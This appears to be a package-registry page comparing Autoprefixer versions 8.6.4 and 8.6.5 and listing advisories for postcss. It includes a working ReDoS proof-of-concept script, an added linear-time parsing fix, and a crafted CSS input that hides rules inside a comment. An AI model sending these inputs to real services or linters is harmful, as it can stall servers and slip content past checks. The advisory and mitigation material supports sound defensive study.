Autoprefixer is a powerful PostCSS plugin that automatically adds vendor prefixes to your CSS, ensuring compatibility across different web browsers without the need for manual prefixing. Comparing versions 8.6.5 and 8.6.4, the core functionality remains consistent, revolving around parsing CSS and applying prefixes based on data from "Can I Use," meaning developers can expect the same reliable prefixing behavior in both versions. The fundamental dependencies like postcss, browserslist, num2fraction, normalize-range, and postcss-value-parser are unchanged, indicating a stable core architecture.
The most notable difference lies in the caniuse-lite dependency, which is updated from version 1.0.30000859 in 8.6.4 to 1.0.30000864 in 8.6.5. This matters because caniuse-lite provides the browser-support data Autoprefixer uses to decide which prefixes are needed, so the update means prefixing decisions are based on more recent data. Developers should upgrade to 8.6.5 to get the latest browser compatibility information, which avoids unnecessary prefixes, keeps the CSS output lean, and maintains compatibility with newer browser versions so that visitors get a consistent, functional experience. The unpacked size also decreased slightly, possibly due to a minor optimization. Finally, the release dates show that version 8.6.5 arrived less than two weeks after 8.6.4, suggesting that a bug fix or minor improvement prompted the quick update.
All vulnerabilities related to version 8.6.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds "a{}" followed by n unterminated "/*# sourceMappingURL=" comment openers;
// the trailing "!" ensures the comment is never closed.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse inputs of growing length and print how long each parse takes,
// so the growth of parse time with input length can be observed.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
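The following is an added example, not postcss's own code or its actual fix: it places a regex shaped like the sub-pattern quoted above next to a linear indexOf scan that finds the same annotation without backtracking, so the reader can see why the repeated, never-closed comment openers from the PoC are cheap for one and quadratic for the other. It assumes annotations have the form `/*# sourceMappingURL=<url> */` as in the PoC, and it does not track CSS string tokens (a real parser does).

```javascript
// Added example (not postcss source). Two ways to pull the source-map annotation
// out of a stylesheet: one mirrors the page's backtracking regex, the other
// scans comment by comment in linear time.

const MARKER = '# sourceMappingURL=';

// Shaped like the vulnerable sub-pattern quoted on the page (an assumption, not
// the exact postcss source). On input that repeats "/*# sourceMappingURL=" and
// never closes the comment, (.*) runs to the end of the string and backtracks
// once per opener, so total work grows quadratically with the input length.
function backtrackingAnnotation(css) {
  const m = css.match(/\/\*\s*# sourceMappingURL=(.*)\*\//);
  return m ? m[1].trim() : null;
}

// Linear replacement: find each "/* ... */" comment in order, remember the last
// one carrying the marker. Each indexOf call starts where the previous one
// stopped, so every character is visited a bounded number of times, and an
// unterminated comment ends the scan immediately instead of being retried.
// Caveat: "/*" inside a quoted CSS string would be mistaken for a comment opener;
// a real tokenizer tracks string state.
function linearAnnotation(css) {
  let url = null;
  let i = 0;
  while (i < css.length) {
    const open = css.indexOf('/*', i);
    if (open === -1) break;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) break;                 // unterminated comment: stop
    const body = css.slice(open + 2, close).trimStart();
    if (body.startsWith(MARKER)) {
      url = body.slice(MARKER.length).trim(); // last annotation wins
    }
    i = close + 2;                            // resume after "*/"
  }
  return url;
}

// Constructed sample input with the same shape as the PoC above: n comment
// openers, none of them closed.
function unterminatedOpeners(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}
```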
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can craft CSS so that parts of it are parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts appear in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.